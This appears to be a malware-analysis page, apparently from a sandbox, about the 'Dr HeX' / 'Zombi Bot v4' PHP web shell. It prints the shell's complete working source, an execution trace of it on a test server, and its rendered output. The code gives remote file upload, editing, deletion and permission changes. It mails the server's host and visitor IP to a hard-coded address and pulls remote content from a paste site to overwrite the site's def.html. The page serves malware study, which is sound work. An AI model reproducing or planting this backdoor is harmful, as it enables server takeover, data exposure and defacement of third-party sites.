Jump to:
Screenshot
Attributes
Emails
<html>
<head>
<title>Dr HeX Shell</title>
<style type="text/css">
</style>
</head>
<header>
<pre>
<center>
Dr HeX Say ="Hello Kids ... :D"
_____ _ _
| __ \ | | | |
| | | |_ _ _ | |__| | _____ __
| | | | '__ | __ |/ _ \ \/ /
| |__| | | | | | | __/> <
|_____/|_| |_| |_|\___/_/\_\
Zombi Bot v4 Extra
[+] - 544 Exploit (Mixed)
[+} - Contact :pz[@]hotmail.com
[+} - Last Update :17/05/2018</center>
</pre>
</header>
</form>
<?php
set_time_limit(0);
error_reporting(0);
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
echo "<!DOCTYPE HTML>\r\n<HTML>\r\n<HEAD>\r\n<link href=\"\" rel=\"stylesheet\" type=\"text/css\">\r\n<title>Dr HeX</title>\r\n<style>\r\nbody{\r\nfont-family: \"Racing Sans One\", cursive;\r\nbackground-color: #e6e6e6;\r\ntext-shadow:0px 0px 1px #757575;\r\n}\r\n#content tr:hover{\r\nbackground-color: #636263;\r\ntext-shadow:0px 0px 10px #fff;\r\n}\r\n#content .first{\r\nbackground-color: silver;\r\n}\r\n#content .first:hover{\r\nbackground-color: silver;\r\ntext-shadow:0px 0px 1px #757575;\r\n}\r\ntable{\r\nborder: 1px #000000 dotted;\r\n}\r\nH1{\r\nfont-family: \"Rye\", cursive;\r\n}\r\na{\r\ncolor: #000;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor: #fff;\r\ntext-shadow:0px 0px 10px #ffffff;\r\n}\r\ninput,select,textarea{\r\nborder: 1px #000000 solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n}\r\n</style>\r\n</HEAD>\r\n<BODY>\r\n<H1><center>Dr HeX</center></H1>\r\n<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr><td>Current Path : ";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<a href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo "</td></tr><tr><td>";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo "<font color=\"green\">File Upload Done Kakak ~_^ .</font><br />";
} else {
echo "<font color=\"red\">File Upload Error ~_~.</font><br />";
}
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\">\r\nUpload File : <input type=\"file\" name=\"file\" />\r\n<input type=\"submit\" value=\"upload\" />\r\n</form>\r\n</td></tr>";
if (isset($_GET['filesrc'])) {
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo "</tr></td></table><br />";
echo '<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], $_POST['perm'])) {
echo "<font color=\"green\">Change Permission Done.</font><br />";
} else {
echo "<font color=\"red\">Change Permission Error.</font><br />";
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo "<font color=\"green\">Change Name Done.</font><br />";
} else {
echo "<font color=\"red\">Change Name Error.</font><br />";
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo "<font color=\"green\">Edit File Done ~_^.</font><br />";
} else {
echo "<font color=\"red\">Edit File Error ~_~.</font><br />";
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
}
echo "</center>";
} else {
echo "</table><br /><center>";
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo "<font color=\"green\">Delete Dir Done.</font><br />";
} else {
echo "<font color=\"red\">Delete Dir Error.</font><br />";
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo "<font color=\"green\">Delete File Done.</font><br />";
} else {
echo "<font color=\"red\">Delete File Error.</font><br />";
}
}
}
echo "</center>";
$scandir = scandir($path);
echo "<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<td><center>Name</center></td>\r\n<td><center>Size</center></td>\r\n<td><center>Permissions</center></td>\r\n<td><center>Options</center></td>\r\n</tr>";
foreach ($scandir as $dir) {
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "<tr>\r\n<td><a href=\"?path={$path}/{$dir}\">{$dir}</a></td>\r\n<td><center>--</center></td>\r\n<td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\">\r\n<option value=\"\"></option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n<input type=\"submit\" value=\">\" />\r\n</form></center></td>\r\n</tr>";
}
echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
foreach ($scandir as $file) {
if (!is_file("{$path}/{$file}")) {
continue;
}
$size = filesize("{$path}/{$file}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo "<tr>\r\n<td><a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\r\n<td><center>" . $size . "</center></td>\r\n<td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\">\r\n<option value=\"\"></option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n<option value=\"edit\">Edit</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n<input type=\"submit\" value=\">\" />\r\n</form></center></td>\r\n</tr>";
}
echo "</table>\r\n</div>";
}
echo "<br />Mr. DellatioNx196 GaLers xh3LL Backd00r <font color=\"red\">1.0</font>, Coded By <font color=\"red\">Mr. DellatioNx196 - Bogor BlackHat</font>\r\n</BODY>\r\n</HTML>";
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
// Socket
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
// Group
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
// World
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
$ip = getenv("REMOTE_ADDR");
$ra44 = rand(1, 99999);
$subj98 = " Bot v4 Rzlt Dr HeX |{$ra44}";
$email = "salemmokhtar6@gmail.com";
$from = "From: Result<botv4@mrspybotv4.com";
$a45 = $_SERVER['REQUEST_URI'];
$b75 = $_SERVER['HTTP_HOST'];
$m22 = $ip . "";
$msg8873 = "{$a45} {$b75} {$m22}";
mail($email, $subj98, $msg8873, $from);
$check3 = $_SERVER['DOCUMENT_ROOT'] . "/def.html";
$text3 = http_get('https://hastebin.com/raw/gejoqohenu');
$op3 = fopen($check3, 'w');
fwrite($op3, $text3);
fclose($op3);
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:39:56.755499]
1 0 1 0.000137 393528
1 3 0 0.000509 451664 {main} 1 /var/www/html/uploads/v4.PhP.php5 0 0
2 4 0 0.000531 451664 set_time_limit 0 /var/www/html/uploads/v4.PhP.php5 29 1 0
2 4 1 0.000549 451728
2 4 R FALSE
2 5 0 0.000563 451696 error_reporting 0 /var/www/html/uploads/v4.PhP.php5 30 1 0
2 5 1 0.000576 451736
2 5 R 22527
2 6 0 0.000589 451696 get_magic_quotes_gpc 0 /var/www/html/uploads/v4.PhP.php5 32 0
2 6 1 0.000602 451696
2 6 R FALSE
2 7 0 0.000615 451696 getcwd 0 /var/www/html/uploads/v4.PhP.php5 88 0
2 7 1 0.000628 451744
2 7 R '/var/www/html/uploads'
1 A /var/www/html/uploads/v4.PhP.php5 88 $path = '/var/www/html/uploads'
2 8 0 0.000657 451744 str_replace 0 /var/www/html/uploads/v4.PhP.php5 90 3 '\\' '/' '/var/www/html/uploads'
2 8 1 0.000672 451840
2 8 R '/var/www/html/uploads'
1 A /var/www/html/uploads/v4.PhP.php5 90 $path = '/var/www/html/uploads'
2 9 0 0.000696 451744 explode 0 /var/www/html/uploads/v4.PhP.php5 91 2 '/' '/var/www/html/uploads'
2 9 1 0.000710 452320
2 9 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/v4.PhP.php5 91 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/v4.PhP.php5 93 $id = 0
1 A /var/www/html/uploads/v4.PhP.php5 95 $a = TRUE
1 A /var/www/html/uploads/v4.PhP.php5 93 $id = 1
1 A /var/www/html/uploads/v4.PhP.php5 101 $i = 0
1 A /var/www/html/uploads/v4.PhP.php5 101 $i++
1 A /var/www/html/uploads/v4.PhP.php5 101 $i++
1 A /var/www/html/uploads/v4.PhP.php5 93 $id = 2
1 A /var/www/html/uploads/v4.PhP.php5 101 $i = 0
1 A /var/www/html/uploads/v4.PhP.php5 101 $i++
1 A /var/www/html/uploads/v4.PhP.php5 101 $i++
1 A /var/www/html/uploads/v4.PhP.php5 101 $i++
1 A /var/www/html/uploads/v4.PhP.php5 93 $id = 3
1 A /var/www/html/uploads/v4.PhP.php5 101 $i = 0
1 A /var/www/html/uploads/v4.PhP.php5 101 $i++
1 A /var/www/html/uploads/v4.PhP.php5 101 $i++
1 A /var/www/html/uploads/v4.PhP.php5 101 $i++
1 A /var/www/html/uploads/v4.PhP.php5 101 $i++
1 A /var/www/html/uploads/v4.PhP.php5 93 $id = 4
1 A /var/www/html/uploads/v4.PhP.php5 101 $i = 0
1 A /var/www/html/uploads/v4.PhP.php5 101 $i++
1 A /var/www/html/uploads/v4.PhP.php5 101 $i++
1 A /var/www/html/uploads/v4.PhP.php5 101 $i++
1 A /var/www/html/uploads/v4.PhP.php5 101 $i++
1 A /var/www/html/uploads/v4.PhP.php5 101 $i++
2 10 0 0.000950 452248 scandir 0 /var/www/html/uploads/v4.PhP.php5 192 1 '/var/www/html/uploads'
2 10 1 0.000981 452872
2 10 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'v4.PhP.php5']
1 A /var/www/html/uploads/v4.PhP.php5 192 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'v4.PhP.php5']
2 11 0 0.001019 452888 is_dir 0 /var/www/html/uploads/v4.PhP.php5 202 1 '/var/www/html/uploads/.'
2 11 1 0.001035 452952
2 11 R TRUE
2 12 0 0.001049 452920 is_dir 0 /var/www/html/uploads/v4.PhP.php5 202 1 '/var/www/html/uploads/..'
2 12 1 0.001063 452968
2 12 R TRUE
2 13 0 0.001076 452928 is_dir 0 /var/www/html/uploads/v4.PhP.php5 202 1 '/var/www/html/uploads/.htaccess'
2 13 1 0.001091 452968
2 13 R FALSE
2 14 0 0.001105 452928 is_dir 0 /var/www/html/uploads/v4.PhP.php5 202 1 '/var/www/html/uploads/data'
2 14 1 0.001119 452968
2 14 R TRUE
2 15 0 0.001133 452928 is_writable 0 /var/www/html/uploads/v4.PhP.php5 207 1 '/var/www/html/uploads/data'
2 15 1 0.001149 452968
2 15 R TRUE
2 16 0 0.001163 452928 perms 1 /var/www/html/uploads/v4.PhP.php5 209 1 '/var/www/html/uploads/data'
3 17 0 0.001176 452928 fileperms 0 /var/www/html/uploads/v4.PhP.php5 269 1 '/var/www/html/uploads/data'
3 17 1 0.001189 452968
3 17 R 16895
2 A /var/www/html/uploads/v4.PhP.php5 269 $perms = 16895
2 A /var/www/html/uploads/v4.PhP.php5 285 $info = 'd'
2 A /var/www/html/uploads/v4.PhP.php5 298 $info .= 'r'
2 A /var/www/html/uploads/v4.PhP.php5 299 $info .= 'w'
2 A /var/www/html/uploads/v4.PhP.php5 302 $info .= 'x'
2 A /var/www/html/uploads/v4.PhP.php5 305 $info .= 'r'
2 A /var/www/html/uploads/v4.PhP.php5 306 $info .= 'w'
2 A /var/www/html/uploads/v4.PhP.php5 309 $info .= 'x'
2 A /var/www/html/uploads/v4.PhP.php5 312 $info .= 'r'
2 A /var/www/html/uploads/v4.PhP.php5 313 $info .= 'w'
2 A /var/www/html/uploads/v4.PhP.php5 316 $info .= 'x'
2 16 1 0.001319 452968
2 16 R 'drwxrwxrwx'
2 18 0 0.001334 452928 is_writable 0 /var/www/html/uploads/v4.PhP.php5 210 1 '/var/www/html/uploads/data'
2 18 1 0.001349 452968
2 18 R TRUE
2 19 0 0.001363 452936 is_dir 0 /var/www/html/uploads/v4.PhP.php5 202 1 '/var/www/html/uploads/prepend.php'
2 19 1 0.001379 452984
2 19 R FALSE
2 20 0 0.001392 452944 is_dir 0 /var/www/html/uploads/v4.PhP.php5 202 1 '/var/www/html/uploads/v4.PhP.php5'
2 20 1 0.001406 452984
2 20 R FALSE
2 21 0 0.001420 452928 is_file 0 /var/www/html/uploads/v4.PhP.php5 229 1 '/var/www/html/uploads/.'
2 21 1 0.001434 452952
2 21 R FALSE
2 22 0 0.001447 452920 is_file 0 /var/www/html/uploads/v4.PhP.php5 229 1 '/var/www/html/uploads/..'
2 22 1 0.001460 452968
2 22 R FALSE
2 23 0 0.001473 452928 is_file 0 /var/www/html/uploads/v4.PhP.php5 229 1 '/var/www/html/uploads/.htaccess'
2 23 1 0.001488 452968
2 23 R TRUE
2 24 0 0.001501 452928 filesize 0 /var/www/html/uploads/v4.PhP.php5 230 1 '/var/www/html/uploads/.htaccess'
2 24 1 0.001513 452968
2 24 R 64
1 A /var/www/html/uploads/v4.PhP.php5 230 $size = 0.0625
2 25 0 0.001537 452872 round 0 /var/www/html/uploads/v4.PhP.php5 231 2 0.0625 3
2 25 1 0.001551 452944
2 25 R 0.063
1 A /var/www/html/uploads/v4.PhP.php5 231 $size = 0.063
1 A /var/www/html/uploads/v4.PhP.php5 235 $size = '0.063 KB'
2 26 0 0.001587 452968 is_writable 0 /var/www/html/uploads/v4.PhP.php5 242 1 '/var/www/html/uploads/.htaccess'
2 26 1 0.001602 453008
2 26 R FALSE
2 27 0 0.001615 452968 is_readable 0 /var/www/html/uploads/v4.PhP.php5 243 1 '/var/www/html/uploads/.htaccess'
2 27 1 0.001630 453008
2 27 R TRUE
2 28 0 0.001644 452968 perms 1 /var/www/html/uploads/v4.PhP.php5 244 1 '/var/www/html/uploads/.htaccess'
3 29 0 0.001656 452968 fileperms 0 /var/www/html/uploads/v4.PhP.php5 269 1 '/var/www/html/uploads/.htaccess'
3 29 1 0.001669 453008
3 29 R 33188
2 A /var/www/html/uploads/v4.PhP.php5 269 $perms = 33188
2 A /var/www/html/uploads/v4.PhP.php5 279 $info = '-'
2 A /var/www/html/uploads/v4.PhP.php5 298 $info .= 'r'
2 A /var/www/html/uploads/v4.PhP.php5 299 $info .= 'w'
2 A /var/www/html/uploads/v4.PhP.php5 302 $info .= '-'
2 A /var/www/html/uploads/v4.PhP.php5 305 $info .= 'r'
2 A /var/www/html/uploads/v4.PhP.php5 306 $info .= '-'
2 A /var/www/html/uploads/v4.PhP.php5 309 $info .= '-'
2 A /var/www/html/uploads/v4.PhP.php5 312 $info .= 'r'
2 A /var/www/html/uploads/v4.PhP.php5 313 $info .= '-'
2 A /var/www/html/uploads/v4.PhP.php5 316 $info .= '-'
2 28 1 0.001789 453008
2 28 R '-rw-r--r--'
2 30 0 0.001803 452968 is_writable 0 /var/www/html/uploads/v4.PhP.php5 245 1 '/var/www/html/uploads/.htaccess'
2 30 1 0.001819 453008
2 30 R FALSE
2 31 0 0.001833 452968 is_readable 0 /var/www/html/uploads/v4.PhP.php5 245 1 '/var/www/html/uploads/.htaccess'
2 31 1 0.001847 453008
2 31 R TRUE
2 32 0 0.001861 452968 is_file 0 /var/www/html/uploads/v4.PhP.php5 229 1 '/var/www/html/uploads/data'
2 32 1 0.001876 453008
2 32 R FALSE
2 33 0 0.001889 452976 is_file 0 /var/www/html/uploads/v4.PhP.php5 229 1 '/var/www/html/uploads/prepend.php'
2 33 1 0.001904 453024
2 33 R TRUE
2 34 0 0.001916 452984 filesize 0 /var/www/html/uploads/v4.PhP.php5 230 1 '/var/www/html/uploads/prepend.php'
2 34 1 0.001930 453024
2 34 R 57
1 A /var/www/html/uploads/v4.PhP.php5 230 $size = 0.0556640625
2 35 0 0.001953 452880 round 0 /var/www/html/uploads/v4.PhP.php5 231 2 0.0556640625 3
2 35 1 0.001966 452952
2 35 R 0.056
1 A /var/www/html/uploads/v4.PhP.php5 231 $size = 0.056
1 A /var/www/html/uploads/v4.PhP.php5 235 $size = '0.056 KB'
2 36 0 0.002006 452984 is_writable 0 /var/www/html/uploads/v4.PhP.php5 242 1 '/var/www/html/uploads/prepend.php'
2 36 1 0.002022 453024
2 36 R FALSE
2 37 0 0.002035 452984 is_readable 0 /var/www/html/uploads/v4.PhP.php5 243 1 '/var/www/html/uploads/prepend.php'
2 37 1 0.002050 453024
2 37 R TRUE
2 38 0 0.002063 452984 perms 1 /var/www/html/uploads/v4.PhP.php5 244 1 '/var/www/html/uploads/prepend.php'
3 39 0 0.002076 452984 fileperms 0 /var/www/html/uploads/v4.PhP.php5 269 1 '/var/www/html/uploads/prepend.php'
3 39 1 0.002089 453024
3 39 R 33261
2 A /var/www/html/uploads/v4.PhP.php5 269 $perms = 33261
2 A /var/www/html/uploads/v4.PhP.php5 279 $info = '-'
2 A /var/www/html/uploads/v4.PhP.php5 298 $info .= 'r'
2 A /var/www/html/uploads/v4.PhP.php5 299 $info .= 'w'
2 A /var/www/html/uploads/v4.PhP.php5 302 $info .= 'x'
2 A /var/www/html/uploads/v4.PhP.php5 305 $info .= 'r'
2 A /var/www/html/uploads/v4.PhP.php5 306 $info .= '-'
2 A /var/www/html/uploads/v4.PhP.php5 309 $info .= 'x'
2 A /var/www/html/uploads/v4.PhP.php5 312 $info .= 'r'
2 A /var/www/html/uploads/v4.PhP.php5 313 $info .= '-'
2 A /var/www/html/uploads/v4.PhP.php5 316 $info .= 'x'
2 38 1 0.002209 453024
2 38 R '-rwxr-xr-x'
2 40 0 0.002223 452984 is_writable 0 /var/www/html/uploads/v4.PhP.php5 245 1 '/var/www/html/uploads/prepend.php'
2 40 1 0.002238 453024
2 40 R FALSE
2 41 0 0.002252 452984 is_readable 0 /var/www/html/uploads/v4.PhP.php5 245 1 '/var/www/html/uploads/prepend.php'
2 41 1 0.002267 453024
2 41 R TRUE
2 42 0 0.002285 453096 is_file 0 /var/www/html/uploads/v4.PhP.php5 229 1 '/var/www/html/uploads/v4.PhP.php5'
2 42 1 0.002299 453136
2 42 R TRUE
2 43 0 0.002312 453096 filesize 0 /var/www/html/uploads/v4.PhP.php5 230 1 '/var/www/html/uploads/v4.PhP.php5'
2 43 1 0.002324 453136
2 43 R 9473
1 A /var/www/html/uploads/v4.PhP.php5 230 $size = 9.2509765625
2 44 0 0.002347 452992 round 0 /var/www/html/uploads/v4.PhP.php5 231 2 9.2509765625 3
2 44 1 0.002360 453064
2 44 R 9.251
1 A /var/www/html/uploads/v4.PhP.php5 231 $size = 9.251
1 A /var/www/html/uploads/v4.PhP.php5 235 $size = '9.251 KB'
2 45 0 0.002395 453096 is_writable 0 /var/www/html/uploads/v4.PhP.php5 242 1 '/var/www/html/uploads/v4.PhP.php5'
2 45 1 0.002410 453136
2 45 R FALSE
2 46 0 0.002423 453096 is_readable 0 /var/www/html/uploads/v4.PhP.php5 243 1 '/var/www/html/uploads/v4.PhP.php5'
2 46 1 0.002438 453136
2 46 R TRUE
2 47 0 0.002451 453096 perms 1 /var/www/html/uploads/v4.PhP.php5 244 1 '/var/www/html/uploads/v4.PhP.php5'
3 48 0 0.002463 453096 fileperms 0 /var/www/html/uploads/v4.PhP.php5 269 1 '/var/www/html/uploads/v4.PhP.php5'
3 48 1 0.002476 453136
3 48 R 33204
2 A /var/www/html/uploads/v4.PhP.php5 269 $perms = 33204
2 A /var/www/html/uploads/v4.PhP.php5 279 $info = '-'
2 A /var/www/html/uploads/v4.PhP.php5 298 $info .= 'r'
2 A /var/www/html/uploads/v4.PhP.php5 299 $info .= 'w'
2 A /var/www/html/uploads/v4.PhP.php5 302 $info .= '-'
2 A /var/www/html/uploads/v4.PhP.php5 305 $info .= 'r'
2 A /var/www/html/uploads/v4.PhP.php5 306 $info .= 'w'
2 A /var/www/html/uploads/v4.PhP.php5 309 $info .= '-'
2 A /var/www/html/uploads/v4.PhP.php5 312 $info .= 'r'
2 A /var/www/html/uploads/v4.PhP.php5 313 $info .= '-'
2 A /var/www/html/uploads/v4.PhP.php5 316 $info .= '-'
2 47 1 0.002595 453136
2 47 R '-rw-rw-r--'
2 49 0 0.002609 453096 is_writable 0 /var/www/html/uploads/v4.PhP.php5 245 1 '/var/www/html/uploads/v4.PhP.php5'
2 49 1 0.002623 453136
2 49 R FALSE
2 50 0 0.002637 453096 is_readable 0 /var/www/html/uploads/v4.PhP.php5 245 1 '/var/www/html/uploads/v4.PhP.php5'
2 50 1 0.002650 453136
2 50 R TRUE
2 51 0 0.002665 453032 getenv 0 /var/www/html/uploads/v4.PhP.php5 322 1 'REMOTE_ADDR'
2 51 1 0.002678 453104
2 51 R '127.0.0.1'
1 A /var/www/html/uploads/v4.PhP.php5 322 $ip = '127.0.0.1'
2 52 0 0.002702 453072 rand 0 /var/www/html/uploads/v4.PhP.php5 323 2 1 99999
2 52 1 0.002717 453136
2 52 R 1461
1 A /var/www/html/uploads/v4.PhP.php5 323 $ra44 = 1461
1 A /var/www/html/uploads/v4.PhP.php5 324 $subj98 = ' Bot v4 Rzlt Dr HeX |1461'
1 A /var/www/html/uploads/v4.PhP.php5 325 $email = 'salemmokhtar6@gmail.com'
1 A /var/www/html/uploads/v4.PhP.php5 326 $from = 'From: Result<botv4@mrspybotv4.com'
1 A /var/www/html/uploads/v4.PhP.php5 327 $a45 = '/uploads/v4.PhP.php5'
1 A /var/www/html/uploads/v4.PhP.php5 328 $b75 = 'localhost'
1 A /var/www/html/uploads/v4.PhP.php5 329 $m22 = '127.0.0.1'
1 A /var/www/html/uploads/v4.PhP.php5 330 $msg8873 = '/uploads/v4.PhP.php5 localhost 127.0.0.1'
2 53 0 0.002821 453248 mail 0 /var/www/html/uploads/v4.PhP.php5 331 4 'salemmokhtar6@gmail.com' ' Bot v4 Rzlt Dr HeX |1461' '/uploads/v4.PhP.php5 localhost 127.0.0.1' 'From: Result<botv4@mrspybotv4.com'
2 53 1 0.003672 453392
2 53 R FALSE
1 A /var/www/html/uploads/v4.PhP.php5 334 $check3 = '/var/www/html/def.html'
1 3 1 0.003716 453640
1 54 0 0.003725 453672 Error->__toString 0 Unknown 0 0
2 55 0 0.003738 453752 Error->getTraceAsString 0 Unknown 0 0
2 55 1 0.003750 454008
2 55 R '#0 {main}'
1 54 1 0.003766 454304
1 54 R 'Error: Call to undefined function http_get() in /var/www/html/uploads/v4.PhP.php5:335\nStack trace:\n#0 {main}'
0.003807 374936
TRACE END [2023-02-13 01:39:56.759197]
<html><head>
<title>Dr HeX Shell</title>
<style type="text/css">
</style>
</head>
<body><header>
<pre> <center>
Dr HeX Say ="Hello Kids ... :D"
_____ _ _
| __ \ | | | |
| | | |_ _ _ | |__| | _____ __
| | | | '__ | __ |/ _ \ \/ /
| |__| | | | | | | __/> <
|_____/|_| |_| |_|\___/_/\_\
Zombi Bot v4 Extra
[+] - 544 Exploit (Mixed)
[+} - Contact :pz[@]hotmail.com
[+} - Last Update :17/05/2018</center>
</pre>
</header>
<link href="" rel="stylesheet" type="text/css">
<title>Dr HeX</title>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
<h1><center>Dr HeX</center></h1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr><td>Current Path : <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file">
<input type="submit" value="upload">
</form>
</td></tr></tbody></table><br><center></center><div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr>
<td><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt">
<option value=""></option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input type="submit" value=">">
</form></center></td>
</tr><tr>
<td><a href="?filesrc=/var/www/html/v4.PhP.php5&path=/var/www/html">v4.PhP.php5</a></td>
<td><center>9.251 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt">
<option value=""></option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="v4.PhP.php5">
<input type="hidden" name="path" value="/var/www/html/v4.PhP.php5">
<input type="submit" value=">">
</form></center></td>
</tr></tbody></table>
</div><br>Mr. DellatioNx196 GaLers xh3LL Backd00r <font color="red">1.0</font>, Coded By <font color="red">Mr. DellatioNx196 - Bogor BlackHat</font>
</body></html>
<html>
<head>
<title>Dr HeX Shell</title>
<style type="text/css">
</style>
</head>
<header>
<pre>
<center>
Dr HeX Say ="Hello Kids ... :D"
